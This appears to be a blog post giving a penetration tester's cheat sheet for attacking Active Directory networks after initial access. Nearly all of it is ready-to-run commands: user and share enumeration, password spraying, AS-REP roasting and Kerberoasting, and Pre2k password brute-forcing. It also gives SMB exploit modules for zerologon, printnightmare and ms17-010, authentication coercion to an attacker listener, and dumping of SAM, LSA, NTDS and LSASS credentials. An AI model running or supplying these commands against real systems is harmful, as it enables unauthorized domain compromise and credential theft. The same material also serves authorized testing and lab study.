Post

Active Directory Enum

Posted Updated
Preview Image
By
6 min read
Active Directory Enum

Active Directory Quick Enum

I creating a simple Quick recon check list for Active Directory environment in Internal Network for Post Exploitation and Persistence.

System & Identity

Identify the Domain Name and Domain IP Addresses.

1
2
3
4
5
6
7
8
9
10

[Domain Name]
nxc smb $target
nmap -sCV -T4 -vv -Pn -A $target

[DC IP]
host $Domain
nmcli dev show <interface>

[IPv6]
python3 IOXIDResolver.py -t  192.168.xx.xx

Assume Breach Scenario

—> Possible Common Attacks

Enumerate Users

1
2
3
4
5
6
7
8
9

nxc smb $ip -u '' -p '' --users
kerbrute  userenum --dc $IP -d $Domain  valid-users.lst  -v
net rpc group members 'Domain Users' -W '<domain> -l <ip> -U '%'
nxc smb $ip -u '' -p '' --rid-brute 10000 | grep -i 'sidtypeuser'
ldapsearch -x -H ldap://ip -D 'user@domain' -w 'pass' -b 'base_name_context' "(objectClass=user)" userPrincipalName
ldapsearch -x -H ldap://ip -D "<user>@<domain>" -w '<password>' -b "<base_name>" -s sub '(objectClass=user)' | grep -i samaccountname | awk -F' ' '{print $2}'
bloodyAD --host $ip -d $domain -u $user -p '$pass' get children --otype useronly
bloodyAD --host $ip -d $domain -u $user -p '$pass' get children --otype computer
impacket-lookupsid $domain/$user@$ip

Enumerate ldap

1
2
3
4
5
6

nmap -Pn -n -sV --script=ldap* -p 389 $ip -vv
ldapsearch -H ldap://ip -x -s base namingcontexts
ldapdomaindump -u $domain\\$user -p '$pass' $ip -o ldap/
ldapsearch -x -H ldap://<target_ip_or_hostname> -b "base name" "(objectClass=*)" "*"
bloodyAD --host $ip -d $domain -u $user -p '$pass' get writable --detail   
bloodyAD -u $user -p '$pass' -d $domain --host $ip get search --filter '(|(userPassword=*)(description=*))' --attr userPassword,description

Enumerate Shares

1
2
3
4
5

smbclient -U '%' -L //<ip>           #recurse OFF   #prompt OFF  #mget *
nxc smb $ip -u '' -p '' --shares
enum4linux-ng.py -a -u '' -p '' <ip>
manspider $ip -c passw -e xml config pdb -d $Domain -u '$user' -p '$pass'
impacket-smbclient [domain]/[username]:[password]@[target_ip]  -k  [domain]/[username]:[LMHASH:NTHASH]@[target_ip]

Generate Usernames

1
2

username-anarchy -i users.txt  > valid-user.lst
GenUser_list.sh  -i users.txt  > valid-user.lst

TimeRoast

1
2
3
4

timeroast.py <dc_ip> -o <output_log>
nxc smb  $ip -M timeroast
nxc smb  $ip -u '' -p '' -M timeroast
nxc smb  $ip -u '' -p '' -M timeroast  -k

Pre2k

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

nxc ldap $ip -u '' -p''  --computers
nxc ldap $ip -u '' -p '' -M pre2k      -k 
python3 pre2k.py unauth -d $domain -dc-ip $ip -inputfile Computers.lst -stoponsucces
python3 pre2k.py auth -u '$user' -p '$pass' -d $domain -dc-ip $ip -save -verbose
ldapsearch -x -H ldap://$IP -D "<user>@<domain>" -w '<password>' -b "<base_name>" -s sub '(objectClass=user)' | grep -i samaccountname | awk -F' ' '{print $2}'


[Hacker Recipe Resource]
# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt

# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt

# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt

# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
nxc smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce

DNS

1
2
3

[zone Transfer]

dig axfr <domain_name> @<name_server>

Spray Password and Hash

1
2
3

nxc smb $ip -u '' -p '' --continue-on-success --no-brute-force
NetSpray all $ip -u '' -p ''  or   -H '' --continue-on-success --no-brute-force
kerbrute passwordspray -d <domain> --dc <DC_IP> <user_list> <password>

AS-Reproasting

1
2
3

nxc ldap $ip -u '' -p '' --asreproast ASREPROAST
impacket-GetNPUsers -dc-ip $ip $Domain/ -usersfile valid_user.lst -format john -outputfile hashes
bloodyAD -u '$user' -p '$password' -d '$domain' --host '$host' get search --filter '(&(!(cn=krbtgt))(&(samAccountType=805306368)(servicePrincipalName=*)))' --attr sAMAccountName | grep sAMAccountName | cut -d ' ' -f 2

Kerbrosting

1
2

nxc ldap $ip -u '' -p '' --kerberoasting output.txt
GetUserSPNs.py '$domain/$user:$pass' -dc-ip $ip -request

Kerbrosting Without preauth

1

GetUserSPN.py domain.local/ -users usersfile -no-preauth $USER -dc-ip $IP

Bloodhound loot

1
2
3
4
5

NetExec ldap $target -u '' -p '' --bloodhound --collection All --dns-server $target
bloodhound-python -d $Domain -u '$user' -p '$pass' -ns $ip -dc $Full_Domain -c All --zip
bloodyAD --host $ip -d $domin -u $user -p '$pass' get bloodhound --transitive --path ./Get_bloodhound_loot.zip
rusthound --domain $Domain -u '$user' -p '$pass' --zip
.\sharpHound.exe -s -c all,gpolocalgroup

—> Possible Protocals Attacks

SMB

It refers to Server Message Block,a network protocol for file/printer sharing across Windows, macOS, Linux, etc.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

[Guest Access]

nxc smb $ip -u '' -p '' 
nxc smb $ip -u 'Guest' -p ''
nxc smb $ip -u '0xmr'  -p ''

[Enumeration]

nxc smb $ip -u '' -p '' --users --shares
nxc smb $ip -u '' -p '' --rid-brute 20000
nxc smb $ip -u '' -p '' --loggedon-users
nxc smb $ip -u '' -p '' --qwinsta
nxc smb $ip -u '' -p '' --pass-pol
nxc smb $ip -u '' -p '' --dc-list
nxc smb $ip -u '' -p '' --interfaces
nxc smb $ip -u '' -p '' --contniue-on-success --no-bruteforce

[Attack]

nxc smb $ip -u '' -p ''  -M change-password -o USER=TargetUser NEWPASS=  or NEWHASH= 
nxc smb $ip -u '' -p ''  -M spider_plus -o DOWNLOAD_FLAG=true            
nxc smb $ip -u '' -p ''  -x 'whoami /all'   
nxc smb $ip -u '' -p ''  -M timeroast          
nxc smb $ip -u '' -p ''  -M pre2k                  

[Top CVE]

nxc smb $ip -u '' -p '' -M zerologon 
nxc smb $ip -u '' -p '' -M nopac 
nxc smb $ip -u '' -p '' -M printnightmare 
nxc smb $ip -u '' -p '' -M smbghost 
nxc smb $ip -u '' -p '' -M ms17-010 
nxc smb $ip -u '' -p '' -M ntlm_reflection 
nxc smb $ip -u '' -p '' -M spooler 
nxc smb $ip -u '' -p '' --gen-relay-list f.txt 
nxc smb $ip -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true

[Credential Dumping]

nxc smb $ip -u '' -p '' -M winscp
nxc smb $ip -u '' -p '' --laps
nxc smb $ip -u '' -p '' --sam
nxc smb $ip -u '' -p '' --lsa
nxc smb $ip -u '' -p '' -M backup_operator
nxc smb $ip -u '' -p '' -M wifi
nxc smb $ip -u '' -p '' -M putty
nxc smb $ip -u '' -p '' -M ntdsutil  or --ntds
nxc smb $ip -u '' -p '' -M lsassy
nxc smb $ip -u '' -p '' -M nanodump
nxc smb $ip -u '' -p '' -M mimikatz
nxc smb $ip -u '' -p '' -M putty
nxc smb $ip -u '' -p '' -M vnc
nxc smb $ip -u '' -p '' --dpapi_hash  or --dpapi
nxc smb $ip -u '' -p '' -M notepad  or -M notepad++

LDAP

It refers to Lightweight Directory Access Protocol.

Coming soon…

Cheatsheet
AD AD Enum
This post is licensed under CC BY 4.0 by the author.